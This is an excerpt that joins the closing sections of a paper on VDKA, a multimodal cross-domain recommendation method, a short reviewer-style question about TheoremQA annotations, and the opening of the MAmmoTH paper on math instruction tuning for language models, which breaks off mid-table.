following findings. (a) Our proposed VDKA method outperforms all other SOTA cross-domain models and multi-modal models. The improvement is significant in all four experimental data sets. Experimental results verify the effectiveness of VDKA in multimodal cross-domain recommendation. (b) Compared with DDGHM and other cross-domain models, VDKA has significantly improved in the four data sets. The experimental results show that our method of disentangled representation and knowledge alignment is effective for cross-domain knowledge transfer. (c) Compared with cross-domain recommendation methods such as BiTGCf, HCGCN method focusing on multi-modal information utilization has better effect. This shows that the extraction and utilization of multi-modal features is as important as the cross-domain module in the multi-modal recommendation. 5.3 Ablation studies (RQ2) In order to explore the influence of each module designed by us on the model effect, we conducted ablation experiments as follows. (a) We removed the variational multimodal graph attention encoder from the model and directly used two MLPs to learn domain-shared and domain-specific representations, denoted as w/o VE. (b) We removed the multimodal graph attention encoder, denoted as w/o GA. (c) We removed the disentangled optimization objective, denoted as w/o DR. (d) We removed the knowledge alignment objective, denoted as w/o KA. The experimental results are shown in Table 3. First, when we replaced the variational encoder with MLP, the model performance decreased significantly. This shows that the variational multimodal graph attention encoder is effective in extracting multimodal data and constructing domain representation. Secondly, when we removed the disentangled target and the knowledge alignment target respectively, the model effect decreases to a certain extent. The experimental results show that these two modules are important to the model. 5.4 Sensitivity analysis (RQ3) To further explore the impact of these parameters on the model effect, we conducted sensitivity analysis on the following key parameters. (a) Impact of $\gamma$. We set the value of $\gamma$ to adjust from [0.2, 0.4, 0.6, 0.8, 1.0] to explore the impact on the model effect. The experimental performance on Table 2: Overall performance comparison of all models on four data sets. | Model | Movie-domain | Book-domain | Food-domain | Kitchen-domain | |-----------|--------------|-------------|-------------|---------------| | | HR@20 | NDCG@20 | MRR@20 | HR@20 | NDCG@20 | MRR@20 | HR@20 | NDCG@20 | MRR@20 | HR@20 | NDCG@20 | MRR@20 | | BPRMF | 0.1568 | 0.1041 | 0.0974 | 0.1407 | 0.0873 | 0.0837 | | | | | | | | NGCF | 0.2319 | 0.1799 | 0.1713 | 0.2167 | 0.1619 | 0.1607 | | | | | | | | MMGCL | 0.2658 | 0.2176 | 0.2114 | 0.2687 | 0.2019 | 0.1845 | | | | | | | | LATTICE | 0.2911 | 0.2336 | 0.2227 | 0.2793 | 0.2201 | 0.2067 | | | | | | | | HCGCN | 0.3253 | 0.2923 | 0.2767 | 0.3003 | 0.2649 | 0.2525 | | | | | | | | DDTCDR | 0.2935 | 0.2621 | 0.2385 | 0.2568 | 0.2145 | 0.2019 | | | | | | | | BiTGCf | 0.3134 | 0.2902 | 0.2775 | 0.2721 | 0.2407 | 0.2337 | | | | | | | | DisenCDR | 0.3265 | 0.2944 | 0.2780 | 0.2867 | 0.2577 | 0.2398 | | | | | | | | DDGHM | 0.3308 | 0.3011 | 0.2883 | 0.2981 | 0.2721 | 0.2635 | | | | | | | | VDKA | **0.3625** | **0.3246** | **0.2932** | **0.3317** | **0.2892** | **0.2764** | | | | | | | | Improvement | 5.25% | 4.78% | 5.81% | 6.16% | 6.77% | 6.77% | | | | | | | Table 3: Ablation experimental results. N denotes the NDCG metric. | Model | Movie | Book | Food | Kitchen | |-----------|-------|------|------|---------| | | HR@20 | N@20 | HR@20 | N@20 | HR@20 | N@20 | HR@20 | N@20 | HR@20 | N@20 | | VDKA | **0.3625** | **0.3246** | **0.3317** | **0.2892** | **0.3272** | **0.2936** | **0.3438** | **0.3212** | | | | w/o VE | 0.2915 | 0.2733 | 0.2553 | 0.2172 | 0.2633 | 0.2386 | 0.2763 | 0.2463 | | | | w/o GA | 0.3304 | 0.3001 | 0.2943 | 0.2639 | 0.2906 | 0.2729 | 0.3186 | 0.2825 | | | | w/o DR | 0.3344 | 0.3085 | 0.3082 | 0.2759 | 0.3186 | 0.2822 | 0.3325 | 0.3097 | | | | w/o KA | 0.3368 | 0.3096 | 0.3124 | 0.2736 | 0.3153 | 0.2774 | 0.3268 | 0.3036 | | | the four experimental data sets is shown in Fig. 2. We can see that with the increase of $\gamma$ value, the performance of the model on multiple data sets has an upward trend, but with the continuous increase of $\gamma$, there is basically no difference in the model effect. (b) Impact of $\lambda$. We let the parameter $\lambda$ adjust the value in [0.2, 0.4, 0.6, 0.8, 1.0]. As shown in Fig. 2, the performance of the model does not change significantly with the increase of $\lambda$ value. (c) Impact of embedding dimension $d$. The experimental results and analysis are provided in Appendix C. Figure 2: Sensitivity study of parameters $\gamma$ and $\lambda$. Table 4: Cross-domain distribution discrepancy. The results are calculated from the $A$-distance based on the cross-domain user representations. | Model | Movie-domain & Book-domain | Food-domain & Kitchen-domain | |----------------|----------------------------|------------------------------| | DDTCDR | 1.3745 | 1.2491 | | DisenCDR | 1.2529 | 1.1672 | | DDGHM | 1.1957 | 1.1328 | | VDKA-w/o DR | 1.1151 | 1.0469 | | VDKA-w/o KA | 1.1072 | 1.0573 | | VDKA | **1.0815** | **1.0151** | 5.5 DISTRIBUTION ANALYSIS (RQ4) **Distribution Discrepancy.** According to domain adaptation theory (Ben-David et al., 2006; Liu et al., 2022), a proxy $A$-distance can be used to measure the difference between two different domains. The difference between the two domain distributions can be calculated by the formula $d_A(S, T) = 2(1 - \epsilon(g))$, where $\epsilon(g)$ denotes the generalization error of a linear classifier $g$. The classifier $g$ is used to distinguish the source domain $S$ from the target domain $T$. The discrepancy in user domain distribution across the two cross-domain datasets are shown in Table 4. We can see that the distribution difference of VDKA proposed by us is significantly lower than that of DDGHM, resulting in better cross-domain performance. When we remove the uncoupling representation and the knowledge alignment, the distribution difference increases to a certain extent. This shows that our design method based on decoupling knowledge transfer can indeed improve the consistency of cross-domain distribution. **Distribution Visualization.** To better show the difference in the distribution of the user embedding learned by different cross-domain methods, we use t-SNE representation for visualization. The visualization results are shown in Fig. 3. We can see that the difference in embedding distribution learned separately in the two domains is quite significant. This difference in distribution makes it difficult to transfer the knowledge of the model in the source domain to the target domain. Through the design of DDGHM model, the difference of embedding distribution can be alleviated to a certain extent. However, there is still a certain bias, and there may be a negative transfer problem. Our VDKA model solves the problem of distribution difference well and realizes accurate cross-domain representation learning through effective knowledge transfer. On the visualization of embedding, it can be seen that the method we propose indeed improves the consistency of cross-domain distribution, so as to provide stronger cross-domain recommendation capability. ![Figure 3](image-url) Figure 3: The t-SNE visualization of user embeddings on the Movie & Book cross-domain dataset. 6 CONCLUSION In this paper, we propose a variational disentangled cross-domain knowledge alignment method for multimodal recommendation. Specifically, we propose a variational multimodal graph attention encoder that can effectively learn domain-sharing and domain-specific representations. Furthermore, adversarial learning is designed to realize cross-domain knowledge alignment. We conducted comprehensive experiments on multiple real-world data sets, and the experimental results show that our proposed VDKA method outperforms all other models. In the future, we will further explore the effective knowledge transfer method such as adversarial knowledge distillation. REFERENCES Shai Ben-David, John Blitzer, Koby Crammer, and Fernando Pereira. Analysis of representations for domain adaptation. *Advances in neural information processing systems*, 19, 2006. Jiangxia Cao, Xixun Lin, Xin Cong, Jing Ya, Tingwen Liu, and Bin Wang. Disencdr: Learning disentangled representations for cross-domain recommendation. In *Proceedings of the 45th International ACM SIGIR Conference on Research and Development in Information Retrieval*, pp. 267–277, 2022a. Jiangxia Cao, Jiawei Sheng, Xin Cong, Tingwen Liu, and Bin Wang. Cross-domain recommendation to cold-start users via variational information bottleneck. In *2022 IEEE 38th International Conference on Data Engineering (ICDE)*, pp. 2209–2223. IEEE, 2022b. Jiangxia Cao, Shaoshuai Li, Bowen Yu, Xiaobo Guo, Tingwen Liu, and Bin Wang. Towards universal cross-domain recommendation. In *Proceedings of the Sixteenth ACM International Conference on Web Search and Data Mining*, pp. 78–86, 2023. Xu Chen, Hanxiong Chen, Hongteng Xu, Yongfeng Zhang, Yixin Cao, Zheng Qin, and Hongyuan Zha. Personalized fashion recommendation with visual explanations based on multimodal attention network: Towards visually explainable recommendation. In *Proceedings of the 42nd International ACM SIGIR Conference on Research and Development in Information Retrieval*, pp. 765–774, 2019. Yongjun Chen, Zhiwei Liu, Jia Li, Julian McAuley, and Caiming Xiong. Intent contrastive learning for sequential recommendation. In *Proceedings of the ACM Web Conference 2022*, pp. 2172–2182, 2022. Yashar Deldjoo, Markus Schedl, and Peter Knees. Content-driven music recommendation: Evolution, state of the art, and challenges. *arXiv preprint arXiv:2107.11803*, 2021. Xiaoyu Du, Zike Wu, Fuli Feng, Xiangnan He, and Jinhui Tang. Invariant representation learning for multimedia recommendation. In *Proceedings of the 30th ACM International Conference on Multimedia*, pp. 619–628, 2022. Zhiqiang Guo, Guohui Li, Jianjun Li, and Huaicong Chen. Topicvae: Topic-aware disentanglement representation learning for enhanced recommendation. In *Proceedings of the 30th ACM International Conference on Multimedia*, pp. 511–520, 2022. Tengyue Han, Pengfei Wang, Shaozhang Niu, and Chenliang Li. Modality matches modality: Pretraining modality-disentangled item representations for recommendation. In *Proceedings of the ACM Web Conference 2022*, pp. 2058–2066, 2022. Ruining He and Julian McAuley. Vbpr: visual bayesian personalized ranking from implicit feedback. In *Proceedings of the AAAI conference on artificial intelligence*, volume 30, 2016. Xiangnan He, Kuan Deng, Xiang Wang, Yan Li, Yongdong Zhang, and Meng Wang. Lightgcn: Simplifying and powering graph convolution network for recommendation. In *Proceedings of the 43rd International ACM SIGIR conference on research and development in Information Retrieval*, pp. 639–648, 2020. Guangneng Hu, Yu Zhang, and Qiang Yang. Conet: Collaborative cross networks for cross-domain recommendation. In *Proceedings of the 27th ACM international conference on information and knowledge management*, pp. 667–676, 2018. Tongwen Huang, Zhiqi Zhang, and Junlin Zhang. Fibinet: combining feature importance and bilinear feature interaction for click-through rate prediction. In *Proceedings of the 13th ACM Conference on Recommender Systems*, pp. 169–177, 2019. SeongKu Kang, Junyoung Hwang, Dongha Lee, and Hwanjo Yu. Semi-supervised learning for cross-domain recommendation to cold-start users. In *Proceedings of the 28th ACM International Conference on Information and Knowledge Management*, pp. 1563–1572, 2019.
yLClGs770I
I'm curious about whether the generated annotation converted from TheoremQA can be successfully executed, because the problems there would require many advanced calculation like integral and derivative computation.
MAmmoTH: Building Math Generalist Models through Hybrid Instruction Tuning *Xiang Yue*, †Xingwei Qu, †Ge Zhang, *Yao Fu, §Wenhao Huang, *Huan Sun, *Yu Su, †Wenhu Chen* †University of Waterloo, *The Ohio State University, †HKUST, °University of Edinburgh, §01.AI [email protected], [email protected] Abstract We introduce MAmmoTH, a series of open-source large language models (LLMs) specifically tailored for general math problem-solving. The MAmmoTH models are trained on MathInstruct, our meticulously curated instruction tuning dataset. MathInstruct is compiled from 13 math datasets with intermediate rationales, six of which have rationales newly curated by us. It presents a unique hybrid of chain-of-thought (CoT) and program-of-thought (PoT) rationales, and also ensures extensive coverage of diverse fields in math. The hybrid of CoT and PoT not only unleashes the potential of tool use but also allows different thought processes for different math problems. As a result, the MAmmoTH series substantially outperform existing open-source models on nine mathematical reasoning datasets across all scales with an average accuracy gain between 16% and 32%. Remarkably, our MAmmoTH-7B model reaches 33% on MATH (a competition-level dataset), which exceeds the best open-source 7B model (WizardMath) by 23%, and the MAmmoTH-34B model achieves 44% accuracy on MATH, even surpassing GPT-4’s CoT result. Our work underscores the importance of diverse problem coverage and the use of hybrid rationales in developing superior math generalist models. Figure 1: The superior performance of MAmmoTH, a series of models instruction-tuned to solve a diverse set of mathematical problems using hybrid CoT and PoT rationales. MAmmoTH significantly outperforms base and SoTA models on both in-domain and out-of-domain test sets, across all scales. * Xiang Yue and Wenhu Chen are the leading authors of the paper. They contributed equally to this project. 1 INTRODUCTION This work focuses on mathematical reasoning, a critical capability of modern large language models (LLMs) (OpenAI [2023], Anil et al. [2023]). Despite the recent advances in this field, a noticeable gap exists between closed-source and open-source LLMs—closed-source models like GPT-4 (OpenAI [2023]), PaLM-2 (Anil et al. [2023]), and Claude 2 (Bai et al. [2022]) dominate popular mathematical reasoning benchmarks such as GSM8K (Cobbe et al. [2021]) and MATH (Hendrycks et al. [2021b]), while open-source models like Llama (Touvron et al. [2023a,b]), Falcon (Penedo et al. [2023]), OPT (Zhang et al. [2022]) lag behind on all benchmarks by a wide margin. Current efforts to bridge this gap are twofold: (1) Continued pre-training like Galactica (Taylor et al. [2022]) and MINERVA (Lewkowycz et al. [2022]), which continues to train an LLM on math-related web data of more than 100B tokens. This approach improves a model’s general scientific reasoning capability but incurs a high computation cost. (2) Dataset-specific fine-tuning like rejection sampling fine-tuning (RFT) (Yuan et al. [2023]) and WizardMath (Luo et al. [2023]), which fine-tunes LLMs using supervised data specific to certain datasets. Although such approaches improve in-domain performance, they cannot generalize to a wider range of math reasoning tasks beyond their fine-tuning data. For instance, both RFT and WizardMath can increase the accuracy on GSM8K (Cobbe et al. [2021]) by 30%+, one of their fine-tuning datasets, but hurt the accuracy on out-of-domain datasets like MMLU-Math (Hendrycks et al. [2021a]) or AQuA (Ling et al. [2017]) by up to 10%. In this paper, we aim to propose a lightweight yet generalizable math instruction-tuning approach to enhance the general (i.e., not limited to the fine-tuning tasks) mathematical reasoning capabilities of LLMs. Existing methods (Luo et al. [2023], Yuan et al. [2023], Taylor et al. [2022]) primarily focus on Chain-of-Thought (CoT) approaches (Wei et al. [2022b], Nye et al. [2022]) to solve math problems through step-by-step natural language descriptions. This approach excels in its generality to cover most math subjects but struggles with computation precision, and complex mathematical or algorithmic reasoning procedures (e.g., solving quadratic equation roots and calculating matrix eigenvalues). In contrast, prompts in the format of code like Program-of-Thought (PoT) approaches (Chen et al. [2022]) and PAL (Madaan et al. [2022], Gao et al. [2023]) utilize external tools (i.e., Python interpreter) to greatly simplify the math solving process. This approach advocates offloading the computation process to the external Python interpreter to solve complex mathematical and algorithmic reasoning procedures (e.g., solving quadratic equations with sympy or calculating matrix eigenvalues with numpy). However, PoT falls short in dealing with more abstract reasoning scenarios, like common-sense reasoning, formal logic, and abstract algebra, especially when there exist no built-in APIs. To leverage the strengths of both CoT and PoT approaches, we introduce a new math hybrid instruction-tuning dataset MathInstruct, which has two main characteristics: (1) broad coverage of different math fields and complexity levels, and (2) hybrid CoT & PoT rationales. MathInstruct is based on seven existing math rationale datasets and six newly-curated datasets (see details in Table 1). We use MathInstruct to fine-tune Llama (Touvron et al. [2023a,b], Rozière et al. [2023]) models of different scales ranging from 7B to 70B. The resulting MAmmoTH models (Figure 1) demonstrate unprecedented potential in serving as math generalists. We evaluate MAmmoTH on a spectrum of datasets, including in-domain (IND) test sets—GSM8K (Cobbe et al. [2021]), MATH (Hendrycks et al. [2021b]), AQuA-RAT (Ling et al. [2017]), NumGLUE (Mishra et al. [2022b])—and out-of-domain (OOD) test sets—SVAMP (Patel et al. [2021]), SAT (Zhong et al. [2023]), MMLU-Math (Hendrycks et al. [2021a]), Mathematics (Davies et al. [2021]), and SimulEq (Koncel-Kedziorski et al. [2016]). Compared with existing methods, our models generalize better to OOD datasets and substantially improve the performance of open-source LLMs in mathematical reasoning. Notably, on the popular competition-level MATH dataset (Hendrycks et al. [2021b]), our 7B model can beat WizardMath (open-source MATH SoTA) (Luo et al. [2023]) by 3.5x (35.2% vs 10.7%), and our 34B MAmmoTH-Coder (fine-tuned on Code Llama (Roziere et al. [2023])) can even beat the result of GPT-4 (using CoT). We highlight our contributions from two perspectives: (1) From the data engineering perspective, we present MathInstruct, a high-quality math instruction tuning dataset, combining a variety of math problems and hybrid rationales. (2) From the modeling perspective, we investigate the impact of various data sources and input-output formats through training and evaluating over 50 different models and baselines ranging from 7B to 70B. Our models, including MAmmoTH and MAmmoTH-Coder, achieve substantial accuracy gains over existing open-source models. | Training Dataset | Type | Annotation | # Samples | Characteristics | Fields | |------------------|------|------------|-----------|-----------------|--------| | GSM8K [Cobbe et al., 2021] | CoT | Human | 7K | Grade Schol Exam | 🟥 | | GSM8K-RFT [Yuan et al., 2023] | CoT | Llama | 28K | Llama + Validated | 🟡 | | AQuA-RAT [Ling et al., 2017] | CoT | Human | 90K | GRE/GMAT Exam | 🟢 | | MATH [Hendrycks et al., 2021b] | CoT | Human | 7K | Math Competition | 🟣 | | TheoremQA [Chen et al., 2023] | CoT | GPT-4 | 600 | GPT4 + Validated | 🟤 | | Camel-Math [Li et al., 2023a] | CoT | GPT-4 | 50K | GPT4 (Unvalidated) | 🟥 | | College-Math | CoT | GPT-4 | 1.8K | GPT4 (Unvalidated) | 🟦 | | GSM8K | PoT | GPT4 | 14K | GPT4 + Validated | 🟧 | | AQuA-RAT | PoT | GPT4 | 9.7K | GPT4 + Validated | 🟨 | | MATH | PoT | GPT4 | 7K | GPT4 + Validated | 🟩 | | TheoremQA | PoT | GPT4 | 700 | GPT4 + Validated | 🟪 | | MathQA [Amini et al., 2019] | PoT | Human | 25K | AQuA-RAT Subset | 🟫 | | NumGLUE [Mishra et al., 2022a] | PoT | Human | 13K | Lila Annotated | 🟬 | | MathInstruct | | | 260K (72% CoT, 28% PoT) | | | Table 1: Overview of our MathInstruct. ⋆ means with NEW rationales curated by us by prompting GPT-4. We have filtered out augmented samples that have answers inconsistent with the original dataset’s annotations. Different colored squares represent different fields in mathematics: 🟥 Pre-Algebra; 🟡 Inter-Algebra; 🟢 Algebra; 🟣 Probability; 🟤 NumTheory; 🟥 Calculus; 🟦 Geometry. 2 OUR APPROACH Mathematical reasoning serves as a vital gauge for assessing the ability of LLMs to execute complex multi-hop and quantitative reasoning. Previously, this has been a challenging task for neural networks, which struggle to solve even basic addition and subtraction problems [Yang et al., 2023]. However, recent LLMs have considerable advancements in mathematical reasoning. Key breakthroughs have been made through CoT prompting [Wei et al., 2022b; Nye et al., 2022] and PoT prompting [Chen et al., 2022; Gao et al., 2023]. CoT prompting encourages LLMs to solve problems incrementally on a scratchpad, enhancing both accuracy and explainability in mathematical reasoning. This approach contrasts with traditional methods that generate answers directly. PoT prompting, on the other hand, formulates the intermediate reasoning process as a program, executed with an external tool like Python, to compute the answer. This method improves robustness in solving complex mathematical problems by offloading the calculations to external tools. However, most existing work [Zhou et al., 2023a] in PoT is limited to proprietary models like GPT-4 [OpenAI, 2023] and Codex [Chen et al., 2021]. The PoT potential of open-source models is yet to be seen. Our work aims at optimizing LLMs’ CoT and PoT reasoning capabilities through instruction tuning. 2.1 CURATING A DIVERSE AND HYBRID INSTRUCTION TUNING DATASET Our study aims to compile a list of high-quality and diverse math instruction-tuning datasets, standing out with two main characteristics: (1) broad coverage of different mathematical fields and complexity levels, and (2) hybrid CoT & PoT rationales. **Broad Coverage of Different Math Fields and Complexity Levels:** We aim for a broad representation of math fields and complexity levels in our dataset. This ensures exposure to a diverse set of mathematical knowledge, fostering versatility in our models. Based on these criteria, we narrow down our choices to a few high-quality datasets that are widely adopted and encompass different math fields and complexity levels, such as GSM8K, MATH, AQuA, Camel, and TheoremQA. Furthermore, we notice a lack of coverage for college-level math knowledge, such as abstract algebra and formal logic, in existing datasets. To rectify this, we use GPT-4 to synthesize CoT rationales for questions in TheoremQA and create question-CoT pairs through Self-Instruct [Wang et al., 2023h], utilizing a few seed exemplars found online. **Hybrid CoT and PoT Rationales:** Contrary to previous work [Yuan et al., 2023; Luo et al., 2023; Lee et al., 2023; Wang et al., 2023g] that focus on CoT, our dataset strategically combines both. This integration enhances the dataset’s versatility, catering to varying mathematical problem-solving approaches. However, most existing datasets provide limited program rationales, leading to an imbalance between CoT and PoT rationales. To fill the gap, we utilize GPT-4 to supplement the PoT rationales for selected datasets, including MATH, AQuA, GSM8K, and TheoremQA. We further enhance the dataset quality by meticulously removing near-duplicated solutions. These GPT-4 synthesized programs are then validated by comparing their executed results with ground truth, ensuring the high quality and reliability of the rationales. The validation subset ratio is shown in Table 6. Following these guidelines, our instruction dataset, detailed in Table 1, encompasses 260K (instruction, response) pairs, covering a wide range of core mathematical fields (arithmetic, algebra, probability, calculus, and geometry, etc.), including hybrid CoT and PoT rationales, and offering diversity in both language and difficulty levels. This attests to its high quality and unique characteristics. ### 2.2 Training Setup We unify all the subsets in our MathInstruct to conform to the structure of an Alpaca-like instruction dataset (Taori et al., 2023). This standardization ensures that the fine-tuned models can process data consistently, regardless of the original dataset formats. We choose the open-source models Llama-2 (Touvron et al., 2023b) and Code Llama (Rozière et al., 2023) as our base models. We fine-tune these models including 7B, 13B, 34B, and 70B on MathInstruct, which allows us to validate our MathInstruct at multiple scales. We fine-tune all the models with Huggingface transformers library (Wolf et al., 2019). We use a learning rate of 2e-5 for the 7B and 13B models, and 1e-5 for the 34B and 70B models. We set the batch size at 128 and used a cosine scheduler with a 3% warm-up period for three epochs. To efficiently train the computationally intensive 34B and 70B models, we employ DeepSpeed training with ZeRO-3 stage (Rajbhandari et al., 2020). ### 2.3 Evaluation Setup Our hybrid training enables models to solve problems using either the CoT or PoT approach. By default, the model provides the CoT solution. To switch to the PoT approach, one can add the trigger phrase “Let’s write a program to solve the problem” following the question. Our preliminary evaluation reveals that PoT generally outperforms CoT, notably in open-form questions like GSM8K and MATH, as programmable solutions are better at solving complex mathematical and algorithmic reasoning procedures. However, PoT struggles with abstract reasoning scenarios such as commonsense reasoning, formal logic, and abstract algebra, particularly in the absence of built-in APIs. To further combine the power of both approaches, we introduce a simple hybrid decoding strategy: The model first attempts PoT prompting. If the program is not executable, we fall back to CoT prompting. This heuristic can further enhance our model’s overall performance (see more discussions in Table 3.4). We also report the performance of self-consistency decoding method (Wang et al., 2023f) in Table 8. ### 3 Experiments #### 3.1 Evaluation Datasets We have selected diverse evaluation datasets (Table 2), encompassing a variety of in-domain and out-of-domain samples across diverse fields of mathematics, to assess the models’ capabilities in general mathematical reasoning. For the in-domain datasets, we consider GSM8K (Cobbe et al., 2021), MATH (Hendrycks et al., 2021b), AQuA-RAT (Ling et al., 2017), and NumGLUE (Mishra et al., 2022b). For the out-of-domain datasets, we choose SVAMP (Patel et al., 2021), Mathematics (Davies et al., 2021), SimulEq (Koncel-Kedziorski et al., 2016), SAT-Math (Zhong et al., 2023), and MMLU-Math (Hendrycks et al., 2021a). The wide selection of evaluation datasets includes math problems from elementary, high school, and college levels. Some of the datasets even include formal logic and commonsense reasoning. The choice of these datasets is to ensure a comprehensive evaluation of the models’ capabilities to generalize to unfamiliar situations and different math fields. The chosen evaluation datasets consist of both open-formed questions and multi-choice questions. | Eval Dataset | # Samples | In-Domain? | Answer Form | Fields | |--------------|-----------|------------|-------------|--------| | GSM8K [Cobbe et al., 2021] | 1319 | YES | Open-formed | ▢ | | MATH [Hendrycks et al., 2021b] | 5000 | YES | Open-formed | ▢ □ △ ▪ ▣ | | AQuA-RAT [Ling et al., 2017] | 254 | YES | Multi-choice | □ | | NumGLUE [Mishra et al., 2022b] | 1042 | YES | Open-formed | ▢ | | SVAMP [Patel et al., 2021] | 1000 | NO | Open-formed | ▢ | | Mathematics [Davies et al., 2021] | 1000 | NO | Open-formed | ▢ □ △ ▪ ▣ | | SimulEq [Koncel-Kedziorski et al., 2016] | 514 | NO | Open-formed | □ | | SAT-Math [Zhong et al., 2023] | 220 | NO | Multi-choice | □ ▪ ▣ | | MMLU-Math [Hendrycks et al., 2021a] | 974 | NO | Multi-choice | □ ▪ ▣ | Table 2: Comprehensive overview of our evaluation datasets, featuring a variety of in-domain and out-of-domain problems across diverse fields of mathematics. Different colored squares represent different fields in mathematics: ▢ Pre-Algebra; □ Inter-Algebra; △ Algebra; ▪ Probability; ▣ NumTheory; ▪ Calculus; ▣ Geometry. ### 3.2 Baselines We partition our baselines into the following four categories: - **Closed-source LLMs:** We consider 4 closed-source LLMs including GPT-4 [OpenAI, 2023], GPT-4 (Code Interpreter), PaLM-2 Unicorn [Anil et al., 2023], Claude-2 [Bai et al., 2022] and Codex [Chen et al., 2021]. GPT-4, PaLM-2, and Claude-2 use CoT prompting while GPT-4 (Code Interpreter) and Codex use PoT prompting. - **Llama Base:** For the base models, we consider Llama-1/2 [Touvron et al., 2023a,b], Llama-2-Chat [Touvron et al., 2023b]. - **Coder Model:** To compare with different coder models, we choose Code-Llama [Rozière et al., 2023], CodeT5+ [Wang et al., 2023i] and CodeGen [Nijkamp et al., 2023]. - **STEM Pre-training:** We cover Galactica [Taylor et al., 2022] mainly to understand the performance of models specialized in STEM knowledge. - **Instruction Tuning:** We include Orca-Platypus [Mukherjee et al., 2023], Vicuna-1.5 [Zheng et al., 2023b], Tulu [Wang et al., 2023g], Platypus-2 [Lee et al., 2023] and Guanaco [Dettmers et al., 2023]. We cover a wide spectrum of models trained with different types of datasets. - **Dataset-Specific Tuning:** We include both RFT [Yuan et al., 2023] and WizardMath [Luo et al., 2023], which specifically tune the models to adapt to GSM8K and MATH datasets. We include them to understand their generalization. For most baselines, we choose CoT prompting to maximize their performance due to their incompetence in program generation. All the ‘Code Model’ use PoT prompting. For GSM8K, MATH, AQuA, and NumGLUE, we will evaluate both 8-shot in-context-learning and zero-shot setups to report the highest score. For SVAMP, Mathematics, SimulEq, SAT, and MMLU, we use 5-shot in-context-learning to maintain consistency with prior work [Wei et al., 2022b, Chen et al., 2023]. Our few-shot exemplars are mostly taken from PHP1 [Zheng et al., 2023a]. For MAmmoTH and MAmmoTH-Coder, we always evaluate under 0-shot setting. For all models, we allow a maximum sequence length of 2048 tokens for decoding. For multiple-choice questions, if the generated answer lacks an option, we map it by re-prompting the model: “Please find the closest option to [generated answer]. The options are [options]”. ### 3.3 Main Results We report our in-domain and out-of-domain results in Table 3 and Table 4 respectively. Overall, we can see that MAmmoTH and MAmmoTH-Coder are able to outperform the SoTA model at different scales. In general, the performance gain for OOD datasets is more significant than IND datasets. These results show us the potential of our models as a mathematical generalist. On several datasets, MAmmoTH-Coder-34B and MAmmoTH-70B are even surpassing closed-source LLMs. --- 1https://github.com/chuanyang-Zheng/Progressive-Hint | Model | Base | Math-SFT? | GSM8K | MATH | AQuA | NumGLUE | Avg | |------------------------|------------|-----------|-------|------|------|---------|-----| | **Closed-source Model**| | | | | | | | | GPT-4 | - | Unknown | 92.0† | 42.5† | 72.6† | 74.7 | 70.5| | GPT-4 (Code-Interpreter)| - | Unknown | 97.0† | 69.7† | - | - | - | | PaLM-2 | - | Unknown | 80.7† | 34.3† | 64.1 | - | - | | Claude-2 | - | Unknown | 85.2† | 32.5† | 60.9 | - | - | | Codex (PoT) | - | No | 71.6† | 36.8† | 54.1† | - | - | | ART (InstructGPT) | - | Unknown | 71.0 | - | 54.2 | - | - | | **7B Parameter Model** | | | | | | | | | Llama-1 | - | No | 10.7† | 2.9† | 22.6 | 24.7 | 15.5| | Llama-2 | - | No | 14.6† | 2.5† | 30.3 | 29.9 | 19.3| | Galactica-6.7B | GAL | GAL-Instruct | 10.2 | 2.2 | 25.6 | 25.8 | 15.9| | Code-Llama (PoT) | - | No | 25.2 | 13.0† | 24.0 | 26.8 | 22.2| | AQuA-SFT | Llama-2 | AQuA | 11.2 | 3.6 | 35.6 | 12.2 | 15.6| | Llama-1 RFT | Llama-1 | GSM8K | 46.5† | 5.2 | 18.8 | 21.1 | 22.9| | WizardMath | Llama-2 | GSM8K+MATH| 54.9† | 10.7† | 26.3 | 36.1 | 32.0| | **MAmmoTH** | Llama-2 | MathInstruct | 53.6 | 31.5 | 44.5 | 61.2 | 47.7| | **MAmmoTH-Coder** | Code-Llama | MathInstruct | 59.4 | 33.4 | 47.2 | 66.4 | 51.6| | Δ | | | +5 | +21 | +12 | +30 | +20 | | **13-15B Parameter Model** | | | | | | | | | Llama-1 | - | No | 17.8† | 3.9† | 26.0 | 24.8 | 18.1| | Llama-2 | - | No | 28.7† | 3.9† | 25.1 | 8.8 | 16.6| | Code-Llama (PoT) | - | No | 36.1 | 16.4† | 28.7 | 29.2 | 27.6| | CodeT5+ (PoT) | - | No | 12.5 | 2.4 | 20.5 | 19.4 | 13.7| | CodeGen+ (PoT) | - | No | 12.7 | 3.4 | 24.5 | 22.5 | 15.7| | Vicuna-1.5 | Llama-2 | No | 28.4† | 5.8 | 24.8 | 36.9 | 23.9| | Llama-1 RFT | Llama-1 | GSM8K | 52.1† | 5.1 | 16.1 | 24.5 | 24.4| | Orca-Platypus | Llama-2 | Platypus | 38.4 | 3.0 | 18.9 | 35.3 | 23.9| | Platypus | Llama-2 | Platypus | 25.7 | 2.5 | 33.4 | 42.3 | 25.9| | WizardMath | Llama-2 | GSM8K+MATH| 63.9† | 14.0† | 21.2 | 40.8 | 34.9| | **MAmmoTH** | Llama-2 | MathInstruct | 62.0 | 34.2 | 51.6 | 68.7 | 54.1| | **MAmmoTH-Coder** | Code-Llama | MathInstruct | 64.7 | 36.3 | 46.9 | 66.8 | 53.7| | Δ | | | +1 | +20 | +18 | +26 | +19| | **30-34B Parameter Model** | | | | | | | | | Llama-1 | - | No | 35.6† | 7.1† | 33.4 | 28.4 | 26.1| | Code-Llama (PoT) | - | No | 44.0 | 23.1 | 25.2 | 29.3 | 30.4| | Llama-1 RFT | Llama-1 | GSM8K | 56.5† | 7.4† | 18.5 | 24.3 | 26.6| | Galactica-30B | GAL | GAL-Instruct | 41.7 | 12.7 | 28.7 | 34.7 | 29.4| | Platypus | Llama-1 | Platypus | 37.8 | 9.3 | 27.9 | 40.5 | 28.8| | Tulu | Llama-2 | Tulu | 51.0 | 10.8 | 25.5 | 43.4 | 32.6| | **MAmmoTH-Coder** | Code-Llama | MathInstruct | 72.7 | 43.6 | 54.7 | 71.6 | 60.7| | Δ | | | +16 | +21 | +21 | +28 | +28| | **65-70B Parameter Model** | | | | | | | | | Llama-1 | - | No | 50.9† | 10.6† | 35.0 | 50.2 | 36.6| | Llama-2 | - | No | 56.8† | 13.5† | 40.9 | 50.4 | 40.4| | Llama-2-Chat | Llama-2 | No | 54.9 | 18.6 | 37.0 | 51.6 | 40.5| | Guanaco | Llama-2 | No | 59.2 | 4.1 | 45.2 | 53.5 | 40.5| | WizardMath | Llama-2 | GSM8K+MATH| 81.6† | 22.7† | 20.0 | 48.9 | 43.3| | Platypus | Llama-2 | Platypus | 70.6 | 15.6 | 51.2 | 55.4 | 48.1| | **MAmmoTH** | Llama-2 | MathInstruct | 76.9 | 41.8 | 65.0 